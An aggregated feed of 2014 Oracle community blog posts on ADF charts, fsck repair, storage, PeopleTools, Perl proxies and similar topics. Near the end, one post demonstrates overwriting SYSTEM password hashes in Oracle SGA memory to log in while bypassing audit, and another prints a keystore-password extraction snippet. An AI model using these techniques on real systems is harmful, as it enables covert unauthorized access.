
Feed aggregator

Downloading VirtualBox VM “Oracle Enterprise Manager 12cR4”

Marco Gralike - Sat, 2014-07-12 11:10
Strangely enough, those cool VirtualBox VM downloads are nowadays a bit scattered across different Oracle sites, on http://otn.oracle.com and others. So in all that...

Read More

ADF 12c (12.1.3) Line Chart Overview Feature

Andrejus Baranovski - Sat, 2014-07-12 10:51
ADF 12c (12.1.3) ships with completely rewritten DVT components; there are no graphs anymore - they are called charts now. But there is much more to it than a name change. The previous DVT components still run fine, but the JDeveloper wizards no longer support them. You should check the ADF 12c (12.1.3) developer guide for more details; in this post I will focus on the line chart overview feature. Keep in mind that the new DVT chart components do not work well with the Google Chrome v.35 browser (supposed to be fixed in Google Chrome v.36) - check the JDeveloper 12c (12.1.3) release notes.

The sample application, ADF12DvtApp.zip, is based on Employees data and displays a line chart of each employee's salary, grouped by job. Two additional lines display the maximum and minimum salaries for the job:


The line chart is configured with zooming and overview support. The user can change the overview window and zoom into a specific area:


This helps a lot when analysing charts with a large number of data points on the X axis. The user can zoom into peaks and analyse a data range:


One important hint about the new DVT charts - the components should stretch automatically. Keep in mind that the parent component (the one surrounding the DVT chart) must be stretchable. As you can see, I have set type = 'stretch' for the panel box surrounding the line chart:


The previous DVT graphs had special binding elements in the Page Definition; the new DVT charts use regular table bindings - nothing extra:


The line chart in the sample application is configured with zooming and scrolling (different modes are available - live, or on demand with a delay):


The overview feature is quite simple to enable - it is enough to add the DVT overview tag to the line chart, and it works:
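As a rough illustration of how the pieces above fit together, the page fragment could look something like this sketch - the component IDs, binding names and attribute values are illustrative, not copied from the sample application:

```xml
<!-- Parent must be stretchable so the chart can stretch automatically -->
<af:panelBox text="Salary Chart" type="stretch" id="pb1">
  <!-- zoomAndScroll="live" enables live zooming and scrolling -->
  <dvt:lineChart id="lineChart1" var="row"
                 value="#{bindings.EmployeesView1.collectionModel}"
                 zoomAndScroll="live">
    <dvt:lineDataItem group="#{row.EmployeeId}" value="#{row.Salary}"
                      id="di1"/>
    <!-- Adding the overview tag is all it takes to enable the feature -->
    <dvt:overview id="ov1"/>
  </dvt:lineChart>
</af:panelBox>
```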

R12.2: Modulus Check Validations for Bank Accounts

OracleApps Epicenter - Sat, 2014-07-12 08:45
The existing bank account number validations for domestic banks only check the length of the bank account number. These validations are performed during the entry and update of bank accounts. With R12.2, the account number validations for the United Kingdom are enhanced to include a modulus check alongside the length checks. Modulus checking is the process of [...]
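In general terms, a modulus check multiplies each digit of the sort code and account number by a published weight, sums the products, and requires the total to be divisible by a modulus (10 or 11). The sketch below illustrates only the general technique - the weight table is made up for the example, not one of the official UK tables that the R12.2 validation would use:

```python
def modulus_check(sort_code, account_number, weights, modulus):
    """Weighted modulus check over the 6-digit sort code plus
    8-digit account number (14 digits total)."""
    digits = [int(d) for d in sort_code + account_number]
    if len(digits) != len(weights):
        raise ValueError("need one weight per digit")
    total = sum(d * w for d, w in zip(digits, weights))
    return total % modulus == 0

# Hypothetical weight table (NOT a real UK modulus table)
weights = [0, 0, 0, 0, 0, 0, 8, 7, 6, 5, 4, 3, 2, 1]
print(modulus_check("201426", "50841153", weights, 11))
```

In the real scheme, the sort code selects which weight table and modulus apply, so a production implementation is driven by the published table data rather than hard-coded weights.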
Categories: APPS Blogs

ORA-09925: Unable to create audit trail file

Oracle in Action - Sat, 2014-07-12 03:33


I received this error message when I started my virtual machine and tried to log on to my database as sysdba to start up the instance.
[oracle@node1 ~]$ sqlplus / as sysdba

ERROR:
ORA-09925: Unable to create audit trail file
Linux Error: 30: Read-only file system
Additional information: 9925
ORA-09925: Unable to create audit trail file
Linux Error: 30: Read-only file system
Additional information: 9925
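Linux Error 30 (EROFS) means the root filesystem has been remounted read-only, which the kernel typically does when it detects corruption. You can confirm this from /proc/mounts before rebooting; the snippet below just demonstrates the parsing logic against a sample line (the device name is illustrative):

```shell
# A line as it appears in /proc/mounts after the kernel remounts /
# read-only: the 4th field starts with "ro" instead of "rw".
line="/dev/sda1 / ext3 ro,relatime 0 0"

# On a live system, replace the echo with: cat /proc/mounts
flags=$(echo "$line" | awk '$2 == "/" {print $4}')
case "$flags" in
  ro*) echo "root is read-only" ;;
  *)   echo "root is read-write" ;;
esac
```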

- I rebooted my machine and got the following messages, which pointed to errors encountered during the filesystem check and instructed me to run fsck manually.

[root@node1 ~]# init 6

Checking filesystems

/: UNEXPECTED INCONSISTENCY; RUN fsck MANUALLY.
(i.e., without -a or -p options)
*** An error occurred during the filesystem check.
*** Dropping you to a shell; the system will reboot
*** when you leave the shell.
Give root password for maintenance
(or type Control-D to continue):

- I entered the password for root to initiate the filesystem check. As a result, I was prompted multiple times to allow fixing of various filesystem errors.

(Repair filesystem) 1 # fsck
Fix(y)?

- After all the errors had been fixed, the filesystem check was restarted:

Restarting e2fsck from the beginning...

/: ***** FILE SYSTEM WAS MODIFIED *****
/: ***** REBOOT LINUX *****

- After the filesystem had finally checked out clean, I exited so the reboot could continue.

(Repair filesystem) 2 # exit

- After the reboot, I could successfully connect to my database as sysdba.

[oracle@node1 ~]$ sqlplus / as sysdba

SQL*Plus: Release 11.2.0.1.0 Production on Sat Jul 12 09:21:52 2014

Copyright (c) 1982, 2009, Oracle. All rights reserved.

Connected to an idle instance.

SQL>

I hope this post was useful.

Your comments and suggestions are always welcome.

Copyright © ORACLE IN ACTION [ORA-09925: Unable to create audit trail file], All Right Reserved. 2014.

The post ORA-09925: Unable to create audit trail file appeared first on ORACLE IN ACTION.

Categories: DBA Blogs

Swimming Progress

Tim Hall - Sat, 2014-07-12 02:59

While I was at BGOUG I went for swim each morning before the conference. That got me to thinking, perhaps I should start swimming again…

It’s been 4 weeks since I got back from the conference and I’ve been swimming every morning. It was a bit of a struggle at first. I think it took me 2-3 days to work up to a mile (1600M – about 9M short of a real mile). Since then I’ve been doing a mile each day and it’s going pretty well.

I’m pretty much an upper body swimmer at the moment. I kick my legs just enough to keep them from sinking, but don’t really generate any forward thrust with them. At this point I’m concentrating on my upper body form. When I think about it, my form is pretty good. When I get distracted, like when I am having to pass people, it breaks down a little. I guess you could say I am in a state of “conscious competence”. Over the next few weeks this should sink in a bit and I can start working on some other stuff. It’s pointless to care too much about speed at this point because if my form breaks down I end up having a faster arm turnover, but use more effort and actually swim slower. The mantra is form, form, form!

Breathing is surprisingly good. I spent years as a left side breather (every 4th stroke). During my last bout of swimming (2003-2008) I forced myself to switch to bilateral breathing, but still felt the left side was more natural. Having had a 6 year break, I’ve come back and both sides feel about the same. If anything, I would say my right side technique is slightly better than my left. Occasionally I will throw in a length of left-only or right-only (every 4th stroke) breathing for the hell of it, but at the moment every 3rd stroke is about the best option for me. As I get fitter I will start playing with things like every 5th stroke and lengths of no breathing just to add a bit of variety.

Turns are generally going pretty well. Most of the time I’m fine. About 1 turn in 20 I judge the distance wrong and end up having a really flimsy push off. I’m sure my judgement will improve over time.

At this point I’m taking about 33 minutes to complete a mile. The world record for 1500M short course (25M pool) is 14:10. My first goal is to get my 1600M time down to double the 1500M world record. Taking 5 minutes off my time seems like quite a big challenge, but I’m sure as I bring my legs into play and my technique improves my speed will increase significantly.

As I get more into the swing of things I will probably incorporate a bit of interval training, like a sprint length, followed by 2-3 at a more sedate pace. That should improve my fitness quite a lot and hopefully improve my speed.

For a bit of fun I’ve added a couple of lengths of butterfly after I finish my main swim. I used to be quite good at butterfly, but at the moment I’m guessing the life guards think I’m having a fit. It would be nice to be able to bang out a few lengths of that and not feel like I was dying. :)

I don’t do breaststroke any more, as it’s not good for my hips. Doing backstroke in a pool with other people in the lane sucks, so I can’t be bothered with that. Maybe on days when the pool is quieter I will work on it a bit, but for now the main focus is crawl.

Cheers

Tim…

PS. I reserve the right to get bored, give up and eat cake instead at any time… :)

Swimming Progress was first posted on July 12, 2014 at 9:59 am.
©2012 "The ORACLE-BASE Blog". Use of this feed is for personal non-commercial use only. If you are not reading this article in your feed reader, then the site is guilty of copyright infringement.

Finished first pass through Alapati 12c OCP upgrade book

Bobby Durrett's DBA Blog - Fri, 2014-07-11 17:29

I just finished reading Sam Alapati’s 12c OCP upgrade book for the first time and I really like it, because it covers content that I hadn’t discovered through my study of the Oracle manuals. It also did a good job explaining some things that Oracle’s manuals left unclear.

After reading each chapter I took the end of chapter test and got between 60% and 75% of the questions right.  Next I plan to take the computer based test that was on the CD that came with the book and which covers both parts of the upgrade exam.

I did find minor errors throughout the book, but I still found it very useful, especially after having already studied the same topics on my own without a study guide like this one to direct me. The author’s insights into the test and the material it covers add value because they guide me to the areas that I need to focus on.

- Bobby

Categories: DBA Blogs

OTN Latin America Tour, 2014

Hans Forbrich - Fri, 2014-07-11 17:12
The dates, and the speakers, for the Latin America Tour have been announced.

http://www.oracle.com/technetwork/es/community/user-groups/otn-latinoamerica-tour-2014-2213115-esa.html


Categories: DBA Blogs

EMC XtremIO – The Full-Featured All-Flash Array. Interested In Oracle Performance? See The Whitepaper.

Kevin Closson - Fri, 2014-07-11 16:32

NOTE: There’s a link to the full article at the end of this post.

I recently submitted a manuscript to the EMC XtremIO Business Unit covering some compelling lab results from testing I concluded earlier this year. I hope you’ll find the paper interesting.

There is a link to the full paper at the bottom of this blog post. I’ve pasted the executive summary here:

Executive Summary

Physical I/O patterns generated by Oracle Database workloads are well understood. The predictable nature of these I/O characteristics has historically enabled platform vendors to implement widely varying I/O acceleration technologies including prefetching, coalescing transfers, tiering, caching and even I/O elimination. However, the key presumption central to all of these acceleration technologies is that there is an identifiable active data set. While it is true that Oracle Database workloads generally settle on an active data set, the active data set for a workload is seldom static—it tends to move based on easily understood factors such as data aging or business workflow (e.g., “month-end processing”) and even the data source itself. Identifying the current active data set and keeping up with movement of the active data set is complex and time consuming due to variability in workloads, workload types, and number of workloads. Storage administrators constantly chase the performance hotspots caused by the active dataset.

All-Flash Arrays (AFAs) can completely eliminate the need to identify the active dataset because of the ability of flash to service any part of a larger data set equally. But not all AFAs are created equal.

Even though numerous AFAs have come to market, obtaining the best performance required by databases is challenging. The challenge isn’t just limited to performance. Modern storage arrays offer a wide variety of features such as deduplication, snapshots, clones, thin provisioning, and replication. These features are built on top of the underlying disk management engine, and are based on the same rules and limitations favoring sequential I/O. Simply substituting flash for hard drives won’t break these features, but neither will it enhance them.

EMC has developed a new class of enterprise data storage system, the XtremIO flash array, which is based entirely on flash media. XtremIO’s approach was not simply to substitute flash in an existing storage controller design or software stack, but rather to engineer an entirely new array from the ground up to unlock flash’s full performance potential and deliver array-based capabilities that are unprecedented in the context of current storage systems.

This paper will help the reader understand Oracle Database performance bottlenecks and how XtremIO AFAs can help address such bottlenecks with its unique capability to deal with constant variance in the IO profile and load levels. We demonstrate that it takes a highly flash-optimized architecture to ensure the best Oracle Database user experience. Please read more:  Link to full paper from emc.com.


Filed under: All Flash Array, Flash Storage for Databases, oracle, Oracle I/O Performance, Oracle performance, Oracle Performnce Monitoring, Oracle SAN Topics, Oracle Storage Related Problems

Best of OTN - Week of July 6th

OTN TechBlog - Fri, 2014-07-11 11:13

Virtual Technology Summit - Content is now OnDemand!

In this four track virtual event attendees had the opportunity to learn firsthand from Oracle ACEs, Java Champions, and Oracle product experts, as they shared their insight and expertise on Java, systems, database and middleware. A replay of the sessions is now available for your viewing.

Architect Community

In addition to interviews with tech experts and community leaders, the OTN ArchBeat YouTube Channel also features technical videos, most pulled from various OTN online technical events. The following are the three most popular of those tech videos for the past seven days.

Debugging and Logging for Oracle ADF Applications
We're only human. Regardless how much work Oracle ADF does for us, or how powerful the JDeveloper IDE is, the inescapable truth is that as developers we will still make mistakes and introduce bugs into our ADF applications. In this video Oracle ADF Product Manager Chris Muir explores the sophisticated debugging tooling JDeveloper provides.

Developer Preview: Oracle WebLogic 12.1.3
Oracle WebLogic 12.1.3 includes some exciting developer-centric enhancements. In this video Steve Button focuses on some of the more interesting updates around Java EE 7 features and examines how they will affect your development process.

Best Practices in Oracle ADF Development
In this video Frank Nimphius presents a brown-bag of ideas, hints and best practices that will help you to build better ADF applications.

Friday Funny
"I always wanted to be somebody, but now I realize I should have been more specific." - Lily Tomlin

Java Community 

Codename One & Java Code Geeks are giving away free JavaOne Tickets (worth $3,300)! Read More!

@Java RT @JDeveloper: Running Oracle ADF application High availability (HA)

Tech Article: Leap Motion and JavaFX

Database Community

OTN DBA/DEV Watercooler Blog - Database Application Development VM--Get It Now

Oracle DB Dev FaceBook Posts -

Systems Community

New Tech Article - Playing with ZFS Shadow Migration

New - Hangout: Which Virtualization Should I Use for What? with Brian Bream


Oracle-PeopleSoft is pleased to announce the general availability of PeopleTools 8.54

PeopleSoft Technology Blog - Fri, 2014-07-11 10:51
PeopleTools is proud to announce the release of PeopleTools 8.54.  This is a landmark release for PeopleSoft, one that offers remarkable advances to our applications and our customers.  We are particularly excited about the new PeopleSoft Fluid User Experience.  With this, our applications will offer a UI that is simple and intuitive, yet highly productive and that can be used on different devices from laptops to tablets and smart phones. 
We’ve also made important improvements in reporting and analytics, life-cycle management, security, integration technology, platforms and infrastructure, and accessibility.

To get the details about everything this wonderful new release has to offer, visit these sites:

  • Release Notes
  • Release Value Proposition
  • Cumulative Feature Overview Tool
  • Installation Guides
  • Certification Table
  • Browser Compatibility Guide
  • Licensing Notes

Today, PeopleTools 8.54 is Generally Available for new installations. Customers that want to upgrade to 8.54 from earlier releases will be able to upgrade in the near future when the 02 patch is available.
Many of our customers have shown interest in Fluid and have asked us the best way to get productive quickly.  Our answer is to use the working examples they will find in the upcoming PSFT 9.2 application images.

E-Business Suite Applications Technology Group (ATG) - WebCast

Chris Warticki - Fri, 2014-07-11 10:20

Thursday July 17, 2014 at 18:00 UK / 10:00 PST / 11:00 MST / 13:00 EST

EBS REPORTS & PRINTING TROUBLESHOOTING

  • Analyzer: E-Business Reports & Printing
  • E-Business Reports Analysis
  • Recommended Reports Patching
  • Reports Profile Options
  • E-Business Printing Analysis
  • Recommended Printing Patching
  • Printer Profile Options
  • Best Practices

Details & Registration : Note 1681612.1

If you have any questions about the schedule, or a suggestion for a future Advisor Webcast, please send an e-mail to Ruediger Ziegler.

Oracle users may require remote database management

Chris Foot - Fri, 2014-07-11 10:01

A well-known security professional recently discovered a bug in one of Oracle's key security features, which may prompt some of its customers to seek active database monitoring solutions.

A good start, but needs work 
According to Dark Reading, David Litchfield, one of the world's best-known database security experts, recently discovered a couple of flaws in Oracle's data redaction feature for its 12c servers. The defensive measure allows database administrators to mask sensitive information from unauthorized viewers.

Although Litchfield regarded the feature as a good deployment, he asserted that a highly skilled hacker would be capable of bypassing the function. He noted that employing a type of Web-based SQL injection is a feasible way for an unauthorized party to gain access to information. Litchfield is expected to demonstrate this technique among others at Black Hat USA in Las Vegas next month. 

"To be fair, it's a good step in the right direction," said Litchfield, as quoted by the source. "Even if a patch isn't available from Oracle, it's going to protect you in 80 percent of the cases. No one really knows how to bypass it at this point."

Constant surveillance
Although Oracle is working to mitigate this problem, enterprises need to wonder what's going to protect them from the other 20 percent of instances. Having a staff of remote database support professionals actively monitor all server activity is arguably the most secure option available. 

Specifically, Oracle customers require assistance from those possessing the wherewithal to defend databases from SQL injection attacks. Network World outlined a few situations in which this invasive technique has caused harrowing experiences for retailers:

  • In the winter of 2007, malware was inserted into Heartland Payment Systems' transaction processing system, resulting in 130 million stolen card numbers. 
  • In early November 2007, Hannaford Brothers sustained a malicious software attack that led to the theft of 4.2 million card access codes.
  • Between January 2011 and March 2012, a series of SQL injection endeavors against Global Payment Systems incited $92.7 million in losses. 

Take the simple steps 
Network World acknowledged the importance of treating routine processes as critical. For example, forgetting to close a database after testing the system for vulnerabilities is negligence that can't be allowed to happen.

In addition, it's imperative that enterprises understand the mapping of their database architectures. This protocol can be realized when organizations employ consistent surveillance of all activity, allowing professionals to see which channels are the most active and what kind of data is flowing through them. 

The post Oracle users may require remote database management appeared first on Remote DBA Experts.

A Ringleader Proxy for Sporadically-Used Web Applications

Pythian Group - Fri, 2014-07-11 08:46

As you might already know, I come up with my fair share of toy web applications.

Once created, I typically throw them on my server for a few weeks but, as the resources of good ol’ Gilgamesh are limited, they eventually have to be turned off to make room for the next wave of shiny new toys. Which is a darn shame, as some of them can be useful from time to time. Sure, running all webapps all the time would be murder for the machine, but there should be a way to only fire up the application when it’s needed.

Of course there’s already a way of doing just that. You might have heard of it: it’s called CGI. And while it’s perfectly possible to run PSGI applications under CGI, it’s also… not quite perfect. The principal problem is that there is no persistence at all between requests (of course, with the help of mod_perl there could be persistence, but that would defeat the purpose), so it’s not exactly snappy. Although, to be fair, it’d probably still be fast enough for most small applications. But still, it feels clunky. Plus, I’m just plain afraid that if I revert to using CGI, Sawyer will burst out of the wall like a vengeful Kool-Aid Man and throttle the life out of me. He probably wouldn’t, but I prefer not to take any chances.

So I don’t want single executions and I don’t want perpetual running. What I’d really want is something in-between. I’d like the applications to be disabled by default but, if a request comes along, to be awakened and run for as long as there is traffic. And only once the traffic has abated for a reasonable amount of time do I want the application to be turned off once more.

The good news is that it seems that Apache’s mod_fastcgi can fire dynamic applications upon first request. If that’s the case, then the waking-up part of the job comes for free, and the shutting down is merely a question of periodically monitoring the logs and killing processes when inactivity is detected.

The bad news is that I only heard that after I was already halfway done shaving that yak my own way. So instead of cruelly dropping the poor creature right there and then, abandoning it with a punk-like half-shave, I decided to go all the way and see how a Perl alternative would look.

It’s all about the proxy

My first instinct was to go with Dancer (natch). But a quick survey of the tools available revealed something even more finely tuned to the task at hand: HTTP::Proxy. That module does exactly what it says on the tin: it proxies http requests, and allows you to fiddle with the requests and responses as they fly back and forth.

Since I own my domain, all my applications run on their own sub-domain name. With that setting, it’s quite easy to have all my sub-domains point to the port running that proxy and have the waking-up-if-required and dispatch to the real application done as the request comes in.


use HTTP::Proxy;
use HTTP::Proxy::HeaderFilter::simple;

my $proxy = HTTP::Proxy->new( port => 3000 );

my $wait_time = 5;
my $shutdown_delay = 10;

my %services = (
    'foo.babyl.ca' => $foo_config,
    'bar.babyl.ca' => $bar_config,

);

$proxy->push_filter( request => 
    HTTP::Proxy::HeaderFilter::simple->new( sub {

            my( $self, $headers, $request ) = @_;

            my $uri = $request->uri;
            my $host = $uri->host;

            my $service = $services{ $host } or die;

            $uri->host( 'localhost' );
            $uri->port( $service->port );

            unless ( $service->is_running ) {
                $service->start;
                sleep 1;
            }

            # store the latest access time
            $service->store_access_time(time);
    }),
);

$proxy->start;

With this, we already have the core of our application, and only need a few more pieces, and details to iron out.

Enter Sandman

An important one is how to detect if an application is running, and when it goes inactive. For that I went for a simple mechanism: using CHI to provide me with a persistent and central place to keep information about my applications. As soon as an application comes up, I store the time of the current request in its cache, and each time a new request comes in, I update the cache with the new time. That way, the existence of the cache tells me if the application is running, and knowing if the application should go dormant is just a question of seeing if the last access time is old enough.


use CHI;

# not a good cache driver for the real system
# but for testing it'll do
my $chi = CHI->new(
    driver => 'File',
    root_dir => 'cache',
);

...;

# when checking if the host is running
unless ( $chi->get($host) ) {
    $service->start;
    sleep 1;
}

...;

# and storing the access time becomes
$chi->set( $host => time );

# to check periodically, we fork a sub-process 
# and we simply endlessly sleep, check, then sleep
# some more

sub start_sandman {
    return if fork;

    while( sleep $shutdown_delay ) {
        check_activity_for( $_ ) for keys %services;
    }
}

sub check_activity_for {
    my $s = shift;

    my $time = $chi->get($s);

    # no cache? assume not running
    return if !$time or time - $time <= $shutdown_delay;

    $services{$s}->stop;

    $chi->remove($s);
}

Minding the applications

The final remaining big piece of the puzzle is how to manage the launching and shutting down of the applications. We could do it in a variety of ways, beginning with plain system calls. Instead, I decided to leverage the service manager Ubic. With the help of Ubic::Service::Plack, setting up a PSGI application is as straightforward as one could wish for:


use Ubic::Service::Plack;

Ubic::Service::Plack->new({
    server => "FCGI",
    server_args => { listen => "/tmp/foo_app.sock",
                     nproc  => 5 },
    app      => "/home/web/apps/foo/bin/app.pl",
    port     => 4444,
});

Once the service is defined, it can be started/stopped from the CLI. And, which is more interesting for us, straight from Perl-land:


use Ubic;

my %services = (
    # sub-domain      # ubic service name
    'foo.babyl.ca' => 'webapp.foo',
    'bar.babyl.ca' => 'webapp.bar',
);

$_ = Ubic->service($_) for values %services;

# and then to start a service
$services{'foo.babyl.ca'}->start;

# or to stop it
$services{'foo.babyl.ca'}->stop;

# other goodies can be gleaned too, like the port...
$services{'foo.babyl.ca'}->port;

Now all together

And that’s all we need to get our ringleader going. Putting it all together, and tidying it up a little bit, we get:


use 5.20.0;

use experimental 'postderef';

use HTTP::Proxy;
use HTTP::Proxy::HeaderFilter::simple;

use Ubic;

use CHI;

my $proxy = HTTP::Proxy->new( port => 3000 );

my $wait_time      = 5;
my $shutdown_delay = 10;

my $ubic_directory = '/Users/champoux/ubic';

my %services = (
    'foo.babyl.ca' => 'webapp.foo',
);

$_ = Ubic->service($_) for values %services;

# not a good cache driver for the real system
# but for testing it'll do
my $chi = CHI->new(
    driver => 'File',
    root_dir => 'cache',
);


$proxy->push_filter( request => HTTP::Proxy::HeaderFilter::simple->new(sub{
            my( $self, $headers, $request ) = @_;
            my $uri = $request->uri;
            my $host = $uri->host;

            my $service = $services{ $host } or die;

            $uri->host( 'localhost' );
            $uri->port( $service->port );

            unless ( $chi->get($host) ) {
                $service->start;
                sleep 1;
            }

            # always store the latest access time
            $chi->set( $host => time );
    }),
);

start_sandman();

$proxy->start;

sub start_sandman {
    return if fork;

    while( sleep $shutdown_delay ) {
        check_activity_for( $_ ) for keys %services;
    }
}

sub check_activity_for {
    my $service = shift;

    my $time = $chi->get($service);

    # no cache? assume not running
    return if !$time or time - $time <= $shutdown_delay;

    $services{$service}->stop;

    $chi->remove($service);
}

It’s not yet complete. The configuration should go in a YAML file, we should have some more safeguards in case the cache and the real state of the application aren’t in sync, and the script itself should be started by Ubic too, to make everything Circle-of-Life-perfect. Buuuuut as it is, I’d say it’s already a decent start.

Categories: DBA Blogs

Log Buffer #379, A Carnival of the Vanities for DBAs

Pythian Group - Fri, 2014-07-11 07:34

During this summer time in the Northern hemisphere, and winter time in the Southern hemisphere, bloggers are solving key problems either while sitting beside the bonfire, or while enjoying that bbq. This Log Buffer Edition shares both of these with them.


Oracle:

3 Key Problems To Solve If You Want A Big Data Management System

OpenWorld Update: Content Catalog NOW LIVE!

Interested in Showcasing your Solutions around Oracle Technologies at Oracle OpenWorld?

GoldenGate and Oracle Data Integrator – A Perfect Match in 12c… Part 4: Start Journalizing!

What You Need to Know about OBIEE 11.1.1.7

SQL Server:

Interoperability between Microsoft and SOA Suite 12c

This article describes a way to speed up various file operations performed by SQL Server.

The Mindset of the Enterprise DBA: Creating and Applying Standards to Our Work

Stairway to T-SQL: Beyond The Basics Level 8: Coding Shortcuts using += and -= Operators

Microsoft Azure Diagnostics Part 2: Basic Configuration of Azure Cloud Service Diagnostics

MySQL:

MySQL Enterprise Monitor 2.3.18 has been released

Harnessing the power of master/slave clusters to operate data-driven businesses on MySQL

NoSQL Now! Conference – coming to San Jose, CA this August!

Manually Switch Slaves to new Masters in mySQL 5.6 (XTRADB 5.6)

How to Configure ClusterControl to run on nginx

Categories: DBA Blogs

powershell goodies for Active Directory

Laurent Schneider - Fri, 2014-07-11 07:04

What are my groups?


PS> Get-ADPrincipalGroupMembership lsc |
      select -ExpandProperty "name"
Domain Users
oracle
sybase

Who is a member of that group?

PS> Get-ADGroupMember oracle| 
      select -ExpandProperty "name"
Laurent Schneider
Alfred E. Newmann
Scott Tiger

What is my phone number?

PS> (get-aduser lsc -property MobilePhone).MobilePhone
+41 792134020

This works like a charm on your Windows 7 PC.
1) Download and install Remote Server Administration Tools
2) Activate the Windows feature called “Active Directory Module for Windows PowerShell” under Control Panel > Programs
3) PS> Import-Module ActiveDirectory
Read the procedure here: how to add the Active Directory module in PowerShell in Windows 7

Oracle E-Business Suite Security - Signed JAR Files - What Should You Do – Part II

In our blog post on 16-May, we provided guidance on Java JAR signing for the E-Business Suite. We are continuing our research on E-Business Suite Java JAR signing and will be presenting it in a forthcoming educational webinar. Until then we would like to share a few items of importance based on recent client conversations -

  • Apply latest patches - The latest patches for Oracle E-Business Suite JAR signing are noted in 1591073.1. There are separate patches for 11i, 12.0.x, 12.1.x and 12.2.x. To fully take advantage of the security features provided by signing JAR files the latest patches need to be applied.
  • Do not use the default Keystore passwords - Before you sign your JAR files change the keystore passwords.  The initial instructions in 1591073.1 note that a possible first step before you start the JAR signing process is to change the keystore passwords. Integrigy recommends that changing the keystore passwords should be mandatory. The default Oracle passwords should not be used. Follow the instructions in Appendix A of 1591073.1 to change both keystore passwords. Each password must be at least six (6) characters in length. If you have already signed your JAR files, after changing the keystore passwords you must create a new keystore and redo all the steps in 1591073.1 to create a new signed certificate (it is much easier to change the keystore passwords BEFORE you sign your JAR files).
  • The keystore passwords are available to anyone with the APPS password - Using the code below anyone with the APPS password can extract the keystore passwords. Ensure that this fact is allowed for in your polices for segregation of duties, keystore management and certificate security.

SQL> set serveroutput on
declare 
spass varchar2(30); 
kpass varchar2(30); 
begin 
ad_jar.get_jripasswords(spass, kpass); 
dbms_output.put_line(spass); 
dbms_output.put_line(kpass); 
end; 
/

This will output the passwords in the following order:

store password (spass) 
key password (kpass)

If you have questions, please contact us at info@integrigy.com.

Tags: Security Strategy and Standards, Oracle E-Business Suite
Categories: APPS Blogs, Security Blogs

How to directly update Oracle password hashes in SGA while avoiding DB security and audit.

ContractOracle - Fri, 2014-07-11 03:22
My previous blog posts showed it was possible to directly update table data in the SGA, bypassing audit and database-level security. The following example expands on that to show how to modify password hashes in the SGA, allowing connection to the database without changing passwords in datafiles.

Basically we updated the password hashes in SGA to known values for user SYSTEM using the following 3 commands :-

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


Output from the DB side is as follows.

First generate a set of password hashes for user SYSTEM with password "badguy".

CDB$ROOT@ORCL> alter user system identified by badguy;

User altered.


CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
E235D5FC5165F1EC
S:319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179;H:E30710ABA2D3492243C239A8854B4E21

Next find the password hashes that need to be replaced.  Below we use sqlplus to extract them from user$, but we could also read them directly from datafile or SGA without logging into the database.

CDB$ROOT@ORCL> alter user system identified by goodguy;

User altered.

CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
09F3A178C7F6F650
S:5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0;H:076F596A5F2AD47593407D24734BF6C0

Demonstrate login using the "goodguy" password.

CDB$ROOT@ORCL> connect system/goodguy;
Connected.

Now replace the password hashes in SGA with the known password hashes for password "badguy".

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


And test to confirm that we can now login using password "badguy".

CDB$ROOT@ORCL> connect system/badguy;
Connected.

This shows that the password hash values in SGA were updated; the database did not crash or detect the change, and it allowed direct login with the modified hashes. Since the change was made only to data in memory, there is no audit record and no evidence in the datafiles (unless a transaction updates the modified blocks and commits them back to disk). It would also be possible to back out the changes to SGA, restoring the original hash values to cover up completely.
Sample output from the first SGA update command above follows :-
[oracle@localhost shared_memory]$ ./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC


WARNING WARNING WARNING

This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.

USAGE :- sga_data_replace searchstring replacestring

Number of input parameters seem correct.
Length of search parameter 09F3A178C7F6F650 matches replace parameter E235D5FC5165F1EC
This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.
SEARCH FOR   :- 09F3A178C7F6F650
REPLACE WITH :- E235D5FC5165F1EC
Enter Y to continue :- Y
/dev/shm/ora_orcl_20381697_76 replace string at 2099160
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_76 replace string at 2271972
/dev/shm/ora_orcl_20381697_76 replace string at 2320344
/dev/shm/ora_orcl_20381697_75 replace string at 994020
/dev/shm/ora_orcl_20381697_68 replace string at 2624228
/dev/shm/ora_orcl_20381697_37 replace string at 450614
/dev/shm/ora_orcl_20381697_35 replace string at 695886
(the same 16 character replacements repeat after each match; trimmed here for readability)
Error: File is empty, nothing to do
Categories: DBA Blogs

C program to find/replace data in Oracle SGA.

ContractOracle - Fri, 2014-07-11 02:49
Following is a proof of concept program to change data in Oracle shared memory mapped to /dev/shm
It uses shm_open and mmap to cleanly open and close the existing shared files, search for a string, and replace it. I have tested it on Linux against Oracle 12c databases, changing data in SGA without crashing the database, and it should also work against 11g. It won't work against Oracle versions prior to 11g, as they manage shared memory in a different manner (Sample program here ).

I am happy for anyone to copy and/or modify this code, but be aware that this program has the potential to crash or corrupt any database on the server where it is run.  Sample output can be found here.

To compile it on Linux :-

gcc sga_data_replace.c -o sga_data_replace -lrt

Note that this blog may strip out some symbols, so if you have issues compiling please check syntax (especially in the include section).

